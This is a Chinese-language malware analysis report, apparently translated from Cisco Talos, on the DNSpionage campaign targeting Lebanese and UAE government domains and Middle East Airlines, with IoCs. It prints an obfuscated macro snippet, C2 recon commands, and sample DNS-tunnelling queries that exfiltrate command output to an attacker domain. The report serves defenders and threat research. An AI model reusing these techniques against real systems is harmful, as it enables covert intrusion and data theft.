DNSpionage恶意活动将目标瞄准中东地区

一、摘要

Cisco Talos团队最近发现了一个针对黎巴嫩和阿联酋的新型恶意活动，主要针对.gov域名以及一家私营黎巴嫩航空公司。根据我们的研究，该恶意活动幕后的组织花费了很长时间来掌握受害者的网络基础设施结构，从而保证他们的攻击过程不会引起注意。

基于该恶意活动使用的基础设施和TTP，我们无法将其与最近观察到的任何其他组织或恶意活动相关联。这一恶意活动使用了两个虚假的恶意网站，网站中包含带有嵌入式宏的恶意Microsoft Office文档，利用恶意文档来对目标造成破坏。该恶意活动中使用的恶意软件，我们将其称为“DNSpionage”，该恶意软件支持通过HTTP和DNS方式与攻击者进行通信。

在每次恶意活动中，攻击者都使用相同的IP地址来对合法.gov网站和私有公司域名的DNS进行重定向。在每次DNS攻击中，攻击者都为重定向的域名生成了Let的加密证书，这些证书为用户免费提供X.509 TLS认证。目前，我们还不知道DNS重定向是否成功。

在本文，我们将剖析攻击者采用的方法，并展示他们是如何使用恶意文档试图诱骗用户打开恶意网站的，这些恶意网站主要针对想要求职的用户。此外，我们还将对恶意DNS重定向事件的时间轴进行描述。

二、感染媒介

2.1 虚假求职网站

首先，攻击者尝试诱导用户访问两个恶意网站，这两个网站均模仿了合法网站：

· hr-wipro[.]com（重定向到wipro.com）

· hr-suncor[.]com（重定向到suncor.com）

在这些站点中，托管了恶意的Microsoft Offcie文档，其URL如下：

· hxxp://hr-suncor[.]com/Suncor_employment_form[.]doc

该文件是加拿大可持续能源公司Suncor Energy网站上提供的合法文件的副本，其中包含恶意宏。

目前，我们还不清楚目标用户是如何收到这些链接的。攻击者很可能通过电子邮件方式发送恶意文档，并将其作为鱼叉式网络钓鱼的一部分。但实际上，该链接也可以通过社交平台（例如LinkedIn）传播，从而使“新工作机会”这一诱导内容显得更加合理。

2.2 恶意Office文档

在打开第一个Office文档后，用户会看到一条提示“内容模式可用”（Content Mode Available）：

2.3 恶意宏分析

我们对样本中使用的宏进行了分析，发现宏主要进行两步操作：

1、打开文档时，宏将解码使用Base 64编码的PE文件，并将其投放到%UserProfile%\.oracleServices\svshost_serv.doc位置。

2、当文档关闭时，宏将文件svshost_serv.doc重命名为svshost_serv.exe。然后，宏将创建一个名为chromium updater v 37.5.0的计划任务，以便执行二进制文件。计划任务会在每分钟执行一次。

这两个步骤的主要目的，是防止沙盒检测。

Payload将在Microsoft Office关闭时执行，这意味着需要通过人工交互才能使其运行。尽管我们可以通过分析获知这些宏的具体功能，但它在Microsoft Word中受到密码保护，受害者将无法通过Microsoft Office查看到宏代码。

此外，宏采用了经典的字符串混淆，以避免字符串检测：

Const e0 = "sc"
Const e1 = "he"
Const e2 = "ule.ser"
'  Create the TaskService object.
Set service = CreateObject(e0 & e1 & "d" & e2 & "vice")
Call service.Connect

“schedule.service”字符串通过组合而成。最终的Payload是一个名为“DNSpionage”的远程管理工具。

三、DNSpionage恶意软件分析

3.1 恶意软件分析

恶意文档投放的恶意软件，是一个此前未发现过的远程管理工具，我们将其命名为DNSpionage，因为它支持将DNS隧道作为与攻击者基础设施进行通信的隐蔽通道。

DNSpionage在运行目录中，创建如下文件和文件夹：

%UserProfile%\.oracleServices/
%UserProfile%\.oracleServices/Apps/
%UserProfile%\.oracleServices/Configure.txt
%UserProfile%\.oracleServices/Downloads/
%UserProfile%\.oracleServices/log.txt
%UserProfile%\.oracleServices/svshost_serv.exe
%UserProfile%\.oracleServices/Uploads/

攻击者使用Downloads目录，存储从C&C服务器下载的其他脚本和工具。

在将文件转发到C&C服务器之前，攻击者使用Uploads目录临时存储文件。

Log.txt文件是一个纯文本形式的日志，所有执行的命令都将记录在该文件中，包含命令的执行结果。

Configure.txt文件中包含恶意软件的配置，攻击者可以指定自定义命令和控制（C&C）URL、URI和作为DNS隐蔽通道的域名。此外，攻击者可以指定自定义Base64字母表实现混淆。我们发现攻击者针对每个目标都使用了自定义的字母。

所有数据都以JSON格式传输，这也就是为什么恶意软件的大部分代码都是JSON库的原因。

3.2 通信方式

恶意软件使用HTTP和DNS的方式，与C&C服务器进行通信。

3.2.1 HTTP模式

使用Base 64编码后的随机数据，执行DNS请求（发送至0ffice36o[.]com）。该请求负责注册被感染的系统，并接收HTTP服务器的IP（分析期间接收到的IP是185.20.184[.]138）。DNS的请求示例如下：

oGjBGFDHSMRQGQ4HY000[.]0ffice36o[.]com

在其上下文中，前四个字符由恶意软件使用rand()函数随机生成。然后，域名的其他部分使用Base32进行编码，其解码后的值为1Fy2048。其中，“Fy”是目标ID，“2048”（0x800）表示“未找到配置文件”。如果没有在受感染的计算机上检索到配置文件，则会发出该请求。这一请求是用于通知攻击者的。

恶意软件向hxxp://IP/Client/Login?id=Fy发送初始HTTP请求，以检索其配置。该请求将用于创建配置文件，特别是设置自定义的Base64字典。

第二个HTTP请求是hxxp://IP/index.html?id=XX，其中“XX”是被感染主机的ID。该请求将用于检索订单，网站是一个虚假的维基百科页面：

这些命令包含在页面的源代码中：

在这一示例中，命令使用标准的Base64算法进行编码，因为目前还没有收到自定义的字母表。下面是使用了自定义字母表的另一个配置文件示例：

C&C服务器会将下面三个命令，自动发送到受感染的系统：

{"c": "echo %username%", "i": "-4000", "t": -1, "k": 0}
{"c": "hostname", "i": "-5000", "t": -1, "k": 0}
{"c": "systeminfo | findstr /B /C:\"Domain\"", "i": "-6000", "t": -1, "k": 0}

恶意软件在执行这些命令后，生成以下代码：

攻击者要求使用用户名和主机名，来检索受感染用户的域名。第一步显然是侦查阶段。数据最终会发送到hxxp://IP/Client/Upload。

最后，CreateProcess()执行命令，并将输出结果重定向到使用CreatePipe()创建的恶意软件通道。

3.2.2 DNS模式

该恶意软件还支持仅DNS模式。在这一模式下，请求和响应将通过DNS实现。这一选项是在受感染计算机上的configure.txt文件中指定。通过利用DNS，有时可以更容易的将信息发回给攻击者，因为它通常会利用DNS协议来逃避代理或Web过滤。

首先，恶意软件进行DNS查询，以请求是否存在订单，例如：

RoyNGBDVIAA0[.]0ffice36o[.]com

首先，需要忽略前四个字符，因为这是随机生成的字符，相关的数据是GBDVIAA0。对Base32进行解码后，其值是“0GT\x00”。GT是目标ID，\x00是请求编号。C&C服务器将回复DNS请求，其回复内容是一个IP地址，尽管不一定是有效的IP，但实际上DNS协议可以接受这个值，例如0.1.0.3。我们认为，第一个值（0x0001）是下一个DNS请求的命令ID，0x0003是命令的大小。

随后，恶意软件使用命令ID执行DNS查询：

t0qIGBDVIAI0[.]0ffice36o[.]com (GBDVIAI0 => "0GT\x01")

C&C服务器将返回一个新的IP：100.105.114.0。如果我们将这个IP地址进行ASCII值转换，将会得到“dir\x00”，也就是要执行的命令。

最后，执行命令的结果将由多个DNS请求发送：

gLtAGJDVIAJAKZXWY000.0ffice36o[.]com -> GJDVIAJAKZXWY000 -> "2GT\x01 Vol"
TwGHGJDVIATVNVSSA000.0ffice36o[.]com -> GJDVIATVNVSSA000 -> "2GT\x02ume"
1QMUGJDVIA3JNYQGI000.0ffice36o[.]com -> GJDVIA3JNYQGI000 -> "2GT\x03in d"
iucCGJDVIBDSNF3GK000.0ffice36o[.]com -> GJDVIBDSNF3GK000 -> "2GT\x04rive"
viLxGJDVIBJAIMQGQ000.0ffice36o[.]com -> GJDVIBJAIMQGQ000 -> "2GT\x05 C h"
[...]

四、被感染用户

由于恶意活动使用了DNS方式，再加上使用了Cisco Umbrella，我们可以确定10月至11月期间的一些受害者的位置。下图为0ffice36o[.]com的分析图表：

查询过程是在黎巴嫩和阿联酋进行的。在下一节中，我们对DNS重定向进行分析，也确认了这一信息。

五、DNS重定向

5.1 简介

Talos发现了三个与DNSpionage域名相关联的IP地址：

· 185.20.184.138

· 185.161.211.72

· 185.20.187.8

这三个IP地址，均由DeltaHost托管。

最后一个IP地址，用于在9月至11月期间进行的DNS重定向攻击。黎巴嫩和阿联酋公共部门的多个域名服务器，以及黎巴嫩的一些公司受到了攻击，他们所拥有的一些主机名被重定向到攻击者控制的IP地址。攻击者在一小段时间内，将主机名重定向到185.20.187.8这个IP地址。在重定向IP之前，攻击者使用Let的加密服务，创建了与域名匹配的证书。

在本节中，我们将介绍监测到的所有DNS重定向实例，以及每个与实例相关联的攻击者生成的证书。我们不知道重定向攻击最终是否成功，也不清楚DNS重定向服务的确切目的。但是，其影响非常大，因为攻击者能够拦截在此期间发往这些主机名的所有流量。由于攻击者专门针对电子邮件和VPN流量，因此可能用于收集其他信息，例如电子邮件和VPN凭据。

由于其收到的电子邮件也会到达攻击者的IP地址，如果存在多因素身份验证，那么将允许攻击者获得滥用的MFA代码。由于攻击者能够访问电子邮件，所以他们也就可以进行额外的攻击，甚至对目标发起勒索。

我们监测到的DNS重定向发生在多个位置，这些被攻陷的资产，没有发现存在基础架构、员工或工作流程上的问题。因此，我们认为这些资产的攻陷，不是由于人为错误，也不是这些组织中管理员的失误，这是攻击者进行的恶意行为。

5.2 针对黎巴嫩政府的重定向攻击

Talos发现黎巴嫩财政部的电子邮件域名，是恶意DNS重定向的目标之一。

webmail.finance.gov.lb在11月6日06:19:13（GMT）被重定向到185.20.187.8。在同一天的05:07:25，创建了Let’s Encrypt证书。

5.3 针对阿联酋政府的重定向攻击

阿联酋的公共设施也是目标之一，我们通过当地警方和电信监管局确定了一个域名。

adpvpn.adpolice.gov.ae在9月13日06:39:39（GMT）被重定向到185.20.187.8。在同一天的05:37:54，创建了Let’s Encrypt证书。

mail.mgov.ae在9月15日07:17:51（GMT）被重定向到185.20.187.8。在同一天的06:15:51，创建了Let’s Encrypt证书。

mail.apc.gov.ae在9月24日被重定向到185.20.187.8。在同一天的05:41:49，创建了Let’s Encrypt证书。

5.4 针对中东航空公司的重定向攻击

Talos发现，黎巴嫩的一家航空公司，中东航空公司（MEA）也是DNS重定向的目标之一。

memail.mea.com.lb在11月14日11:58:36（GMT）被重定向到185.20.187.8。在11月6日10:35:10（GMT），创建了Let’s Encrypt证书。

该证书包含主题行中的备用名称，这是DNS的一项功能，允许将多个域名添加到SSL活动的证书中：

· memail.mea.com.lb

· autodiscover.mea.com.lb

· owa.mea.com.lb

· www.mea.com.lb

· autodiscover.mea.aero

· autodiscover.meacorp.com.lb

· mea.aero

· meacorp.com.lb

· memailfr.meacorp.com.lb

· meoutlook.meacorp.com.lb

· tmec.mea.com.lb

这些域名，是在清晰准确理解受害者域名后创建的，我们相信，攻击者在这些环境中非常活跃，从而了解他们需要生成的特定域名和证书。

六、总结

通过我们的调查，发现了两个事件：DNSpionage恶意软件和DNS重定向恶意活动。针对恶意软件活动，尽管我们不知道确切的目标，但已经将攻击者的目标锁定在了黎巴嫩和阿联酋这两个国家。但是，如上文所述，我们还是希望能够分析出定向恶意活动所针对的目标。

目前，我们有信心确定这两个恶意活动都来自同一个恶意组织。但是，我们对该组织的位置和确切动机知之甚少。很明显，这个恶意组织能在两个月内从两个不同国家的政府域名以及一家黎巴嫩国家航空公司实现DNS重定向。通过利用DNS泄露和重定向，攻击者就可以从系统的角度使用Windows恶意软件。目前还不清楚这些DNS重定向攻击是否成功，但攻击者是在不断尝试，该尝试在今年发生了5次，其中包含过去两周内发生的攻击。

用户在得知这一恶意活动后，应该考虑启用终端保护措施和网络保护措施。这是一个先进的攻击方式，并且将目标放在了一些重要的组织机构上，攻击者应该不会轻易放弃。

七、IoC

在分析相关恶意活动期间，我们发现以下IoC与各类恶意软件分发活动相关联。

假的求职网站：

· hr-wipro[.]com

· hr-suncor[.]com

恶意文档：

· 9ea577a4b3faaf04a3bddbfcb934c9752bed0d0fc579f2152751c5f6923f7e14 （LB submit）

· 15fe5dbcd31be15f98aa9ba18755ee6264a26f5ea0877730b00ca0646d0f25fa （LB submit）

DNSpionage样本：

· 2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec 82285b6743cc5e3545d8e67740a4d04c5aed138d9f31d7c16bd11188a2042969

· 45a9edb24d4174592c69d9d37a534a518fbe2a88d3817fc0cc739e455883b8ff

C&C服务器IP：

· 185.20.184.138

· 185.20.187.8

· 185.161.211.72

C&C服务器域名：

· 0ffice36o[.]com

DNS劫持域名（转向185.20.187.8）：

· 2018-11-14 : memail.mea.com.lb

· 2018-11-06 : webmail.finance.gov.lb

· 2018-09-24 : mail.apc.gov.ae

· 2018-09-15 : mail.mgov.ae

· 2018-09-13 : adpvpn.adpolice.gov.ae

MEA证书中的域名：

· memail.mea.com.lb

· autodiscover.mea.com.lb

· owa.mea.com.lb

· www.mea.com.lb

· autodiscover.mea.aero

· autodiscover.meacorp.com.lb

· mea.aero

· meacorp.com.lb

· memailr.meacorp.com.lb

· meoutlook.meacorp.com.lb

· tmec.mea.com.lb